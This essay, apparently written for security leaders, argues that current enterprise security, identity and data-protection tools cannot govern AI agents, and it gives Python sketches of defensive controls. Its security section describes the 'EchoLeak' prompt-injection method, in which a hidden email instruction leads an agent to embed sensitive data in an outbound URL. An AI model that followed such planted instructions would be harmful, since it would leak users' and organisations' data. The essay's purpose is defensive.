The Modern Security and Governance Stack Isn’t Ready for AI Agents
Agents aren’t the users, non-human identities, APIs, or service accounts that our current tooling was built to cover
Several CISOs I’ve talked to about agent security and governance are rightfully skeptical about all this agent hype. After all, we’ve seen this movie before.
The security market sees “paradigm shifts” every other week. Markets get hyped, tools get bought, and that incredible next generation of security turns out to be shelfware or simply more alerts for analysts in the SOC.
Instead of getting caught up in the hype, the right first instinct is to ask whether current tooling can already handle the “next big thing.” That instinct usually serves us well, but the unique characteristics of agents suggest a more nuanced reality. So let's examine why agents warrant a closer look and why that matters.
Agents are a new class of autonomous logic that exists across operating planes—from the endpoint to the cloud and within your applications. The challenge with leveraging current tools is that they were built on foundations that are fundamentally incongruous with this new actor in the enterprise.
Today, our security is host-centric, our governance is user-centric, and our data protection is exfiltration-centric.
Agents defy these foundational assumptions upon which our tools operate today. We don’t just have a feature gap; instead, we have an architectural mismatch.
To be ready for agents, we need to expand our capabilities beyond our traditional foundations:
Our security must expand from host-centric to also become behavior-centric.
Our governance must expand from user-centric to also become agent-centric.
Our data protection must expand from exfiltration-centric to also become tool-centric.
Architectural Mismatches
The modern security and governance stack is quite effective for humans, non-human identities, static service accounts, and applications:
Host-centric tooling (EDR/XDR) enables us to monitor our hosts and endpoints to detect and stop anomalous behavior.
User-centric tooling (IAM/PAM) enables us to log and audit every user interaction with our applications and data.
Exfiltration-centric tooling (DLP/CASB) enables us to prevent sensitive data from being exfiltrated from the enterprise.
These foundational approaches are woven into today’s modern platforms like CNAPPs and SSEs. Together, this suite of capabilities represents our traditional method for addressing these three core pillars of risk management: security, governance, and data protection.
Enter the Agents
At their core, agents introduce risk not because of what they are, but because of how they behave. As Anton Chuvakin noted in “How Google secures AI Agents”, agents don’t act like other software:
“Securing AI agents is inherently challenging due to four factors:
Unpredictability (non-deterministic nature)
Emergent behaviors [Author’s note: unexpected actions or outcomes from an agent's interactions]
Autonomy in decision-making
Alignment issues (ensuring actions match user intent)”
This agent disruption can be summarized by looking at our three core pillars: security, governance, and data protection. The sections below analyze each pillar in turn, outlining how its traditional foundation is challenged by agents and introducing the new, expanded foundation required to govern them effectively.
Security: Expanding Host-Centric (EDR/XDR) to Include a Behavior-Centric Approach
Host-centric tooling like EDR/XDR excels at finding malicious processes on endpoints. However, when confronted with AI agents, this foundation reveals several blind spots:
There is no endpoint to monitor for a serverless agent. For example, an e-commerce agent that processes customer returns can be triggered by a photo upload to cloud storage. The agent then makes a series of API calls to different services to authorize the return and ship a replacement. This entire workflow runs in the cloud provider's infrastructure, with no traditional host where an EDR/XDR agent can be installed to monitor the agent's logic or actions.
EDR/XDR are blind to logic-based attacks. As the recently publicized “EchoLeak” agent attack demonstrated, a hidden instruction in an email can trick an agent into embedding sensitive data into a URL and exfiltrating it, all without a single click from the user, a malicious file being executed, or a malicious process running on the host for EDR/XDR to detect.
Agents make behavioral analytics (UEBA) unreliable. A UEBA tool that has learned a human's 9-to-5 behavior will be flooded with false positives when an autonomous agent uses that same account to perform thousands of legitimate API calls at 3 AM. The tool is baselining the wrong actor, creating noise that makes it extremely difficult to spot a real threat.
To address these issues, we need tools that are behavior-centric, meaning they can understand the full context of an agent's actions (such as the user, the agent's identity, its specific task, and the tools it is using) to make a security decision, regardless of where the agent is running.
In the EchoLeak example, a behavior-centric tool might have stopped the attack by seeing the full picture. Unlike an EDR that just sees a normal, authorized browser call, a behavior-centric tool would have first identified the agent attempting the risky combination of an untrusted external email influencing a sensitive internal document. By analyzing the agent's entire context, from its inputs to its outputs, the tool could have detected the sensitive data being embedded into the exfiltration URL and blocked the malicious action before any data was lost.
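To make this concrete, here is a minimal Python sketch of what a behavior-centric check might look like. The names here (AgentAction, evaluate, the provenance tags, the sensitivity markers) are hypothetical illustrations, not any particular product’s API; the point is that the decision is made from the agent’s full context, its inputs, identity, task, tool, and output, rather than from host-level signals.

```python
from dataclasses import dataclass, field

@dataclass
class AgentAction:
    """Hypothetical record of a single agent step, captured with its full context."""
    agent_id: str
    on_behalf_of: str                 # the human user the agent is acting for
    task: str                         # the task the agent was asked to perform
    tool: str                         # the tool or API the agent is about to invoke
    inputs: list[str] = field(default_factory=list)  # provenance tags for data influencing this step
    output: str = ""                  # what the agent is about to send or write

# Placeholder sensitivity markers; a real system would use proper data classification.
SENSITIVE_MARKERS = ("confidential", "ssn", "api_key")

def is_untrusted(source: str) -> bool:
    # Assumption: input provenance is tagged upstream, e.g. "external_email" vs. "internal_doc".
    return source.startswith("external_")

def evaluate(action: AgentAction) -> str:
    """Block when untrusted input influences an outbound call carrying sensitive data."""
    tainted = any(is_untrusted(src) for src in action.inputs)
    leaking = action.tool == "http_request" and any(
        marker in action.output.lower() for marker in SENSITIVE_MARKERS
    )
    if tainted and leaking:
        return "block"  # EchoLeak-style pattern: injected instructions driving exfiltration
    return "allow"

# Example: an email-triggered agent tries to embed sensitive data in an outbound URL.
action = AgentAction(
    agent_id="mail-summarizer",
    on_behalf_of="alice@example.com",
    task="summarize inbox",
    tool="http_request",
    inputs=["external_email", "internal_doc"],
    output="https://attacker.example/img?d=CONFIDENTIAL_Q3_FORECAST",
)
print(evaluate(action))  # -> "block"
```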
Governance and Audit: Expanding User-Centric (IAM/PAM) to Include an Agent-Centric Model
User-centric tooling like IAM is the bedrock of our governance programs, designed to ensure only authorized users can access specific resources and to create an audit trail of their interactions. Agents challenge this foundation in the following ways:
Agents fundamentally break the chain of user attribution. When an agent acts using a human’s credentials, the audit log blames the human. It becomes extremely difficult to prove if a destructive action was a malicious choice by the user or an error by the agent, making compliance reviews and forensic analysis fundamentally unreliable. Identity leaders are making this clear as well:
Okta notes, “Traditional authentication methods weren’t built for AI-driven applications, leaving gaps in control and accountability.”
1Password states, “Legacy IAM, IGA, and MDM tools were built for people and devices—not autonomous software. They assume interactive logins, static access patterns, and human oversight. AI agents don’t fit this model.”
Agents aren’t like traditional non-human identities or service accounts. It's tempting to treat agents like the service accounts we use for simple automation. But a service account runs a predictable, deterministic script, like a train on a track. An autonomous agent is like a self-driving car, capable of making its own decisions and exhibiting emergent, unpredictable behaviors. Governing a self-driving car with a train schedule and a static set of permissions is inadequate.
To solve this attribution challenge, we need a governance model that is agent-centric. We need to treat each agent as a distinct, governable identity, separate from its human user, and provide a verifiable chain of command for each agent’s actions.
By logging every action to the agent’s unique ID, it becomes clear whether a given behavior belongs to the user or to the agent. Likewise, by treating an agent as distinct from a non-human identity or service account, we can protect it from being overpermissioned: dynamic, task-based policies grant the agent only the least privilege required for a specific action, rather than the broad, static permissions typical of a service account.
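As a rough illustration, here is a minimal Python sketch of agent-centric attribution and task-scoped grants. Every identifier (TaskGrant, issue_grant, audit_event) is hypothetical; the idea is simply that the agent, not the human, is the actor of record, and that permissions are issued per task with a short lifetime instead of as broad, static roles.

```python
import datetime
import uuid
from dataclasses import dataclass

@dataclass(frozen=True)
class TaskGrant:
    """Hypothetical short-lived, task-scoped grant instead of a static service-account role."""
    agent_id: str
    task_id: str
    allowed_tools: frozenset[str]
    expires_at: datetime.datetime

def issue_grant(agent_id: str, task: str, tools: set[str], ttl_minutes: int = 15) -> TaskGrant:
    # Least privilege: only the tools this task needs, only for a short window.
    return TaskGrant(
        agent_id=agent_id,
        task_id=f"{task}-{uuid.uuid4().hex[:8]}",
        allowed_tools=frozenset(tools),
        expires_at=datetime.datetime.now(datetime.timezone.utc)
        + datetime.timedelta(minutes=ttl_minutes),
    )

def audit_event(grant: TaskGrant, on_behalf_of: str, tool: str, detail: str) -> dict:
    """Attribute the action to the agent's own identity, with the human linked rather than blamed."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return {
        "timestamp": now.isoformat(),
        "actor": grant.agent_id,        # the agent, not the user, is the actor of record
        "on_behalf_of": on_behalf_of,   # verifiable chain of command back to the human
        "task_id": grant.task_id,
        "tool": tool,
        "detail": detail,
        "authorized": tool in grant.allowed_tools and now < grant.expires_at,
    }

# Example: a returns-processing agent is granted only what this specific task requires.
grant = issue_grant("returns-agent", "process-return", {"read_order", "create_shipment"})
print(audit_event(grant, "bob@example.com", "create_shipment", "RMA-1042 replacement"))
```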
Data Protection: Expanding Exfiltration-Centric (DLP/CASB) to Include Tool-Centric Controls
Exfiltration-centric tools like Data Loss Prevention (DLP) and Cloud Access Security Brokers (CASB) form a critical part of our data protection strategy. These tools are gatekeepers at the perimeter, whether the network edge or the border of a SaaS application, to identify sensitive data and prevent it from leaving our control. This focus on the boundary, however, leaves significant gaps when confronted with autonomous agents:
DLP tools are blind to internal agent misuse and sabotage. The most destructive action an agent can take may not involve stealing data but misusing it internally. For example, a data management agent could be manipulated into incorrectly deleting or corrupting thousands of customer records inside a production database. Because no sensitive data crosses a monitored perimeter, exfiltration-centric tools are unaware of this harmful activity. This shifts the definition of data protection beyond data theft to include data misuse and unauthorized actions taken on behalf of the enterprise.
CASBs only govern access to an application, not specific actions within it. A CASB may correctly grant an agent access to SharePoint based on the user's permissions. However, the CASB can’t distinguish between the agent performing its approved task (say, summarizing a report) versus being tricked into performing a malicious action (like changing the permissions on a sensitive file or deleting it). The CASB authorizes the entire session but lacks the granular visibility to police the agent's specific behavior inside that session.
To protect data from misuse, not just theft, we need a tool-centric approach that moves the point of control from the perimeter to the action itself. We can then govern the specific tools an agent is allowed to use, whether APIs, functions, applications, or databases, as well as the conditions under which it’s allowed to perform its task.
In our data management agent example, a tool-centric approach would not just see data being accessed. It would intercept the agent’s specific attempt to call functions on the data and enforce a policy like “This agent is not authorized to execute delete commands on a production database” or “This type of data modification requires human-in-the-loop approval.” We then get defense in depth: DLP still watches the perimeter for theft, while tool-centric controls block destructive behavior to protect data integrity.
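Here is a minimal Python sketch, with hypothetical policy rules and names, of what such a tool-centric control point could look like: it intercepts the agent’s tool call and decides to allow, deny, or escalate for human approval based on the specific operation and target, not on whether data crosses a perimeter.

```python
from dataclasses import dataclass

@dataclass
class ToolCall:
    """Hypothetical representation of an agent's attempt to use a tool."""
    agent_id: str
    tool: str          # e.g. "database.execute"
    operation: str     # e.g. "DELETE", "UPDATE", "SELECT"
    target: str        # e.g. "prod/customers"

def enforce(call: ToolCall) -> str:
    """Decide at the action itself, not at the perimeter."""
    destructive = call.operation in {"DELETE", "DROP", "TRUNCATE"}
    modifying = call.operation in {"UPDATE", "INSERT"}
    production = call.target.startswith("prod/")

    if destructive and production:
        # "This agent is not authorized to execute delete commands on a production database."
        return "deny"
    if modifying and production:
        # "This type of data modification requires human-in-the-loop approval."
        return "require_approval"
    return "allow"

# Example: a manipulated data-management agent tries to purge production customer records.
print(enforce(ToolCall("data-mgmt-agent", "database.execute", "DELETE", "prod/customers")))
# -> "deny"
print(enforce(ToolCall("data-mgmt-agent", "database.execute", "SELECT", "prod/customers")))
# -> "allow"
```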
Towards A New Foundation for Agents
As we've seen, the introduction of agents reveals new architectural gaps across our security and governance stack. Our host-centric security wasn't designed to interpret agent logic, our user-centric governance requires a new model for agent attribution, and our exfiltration-centric data protection wasn't built to oversee complex internal actions.
Taken together, agents aren’t simply a feature or an incremental update. Agents force us to rethink our entire stack because they are a new, human-like partner to govern, one that operates beyond our traditional operating planes.
As we incorporate agents into our workforce, we also need to ground them in the helpful frameworks we already use to measure our current programs. The architectural gaps we've discussed are, in effect, new challenges to the core functions of the NIST Cybersecurity Framework (CSF): our ability to Identify, Protect, Detect, Respond, and Recover. Aligning these new behavior-centric, agent-centric, and tool-centric controls with the guidance in the NIST AI Risk Management Framework (RMF) is a clear path forward. Mapping these capabilities back to specific NIST controls is a critical exercise for every security leader.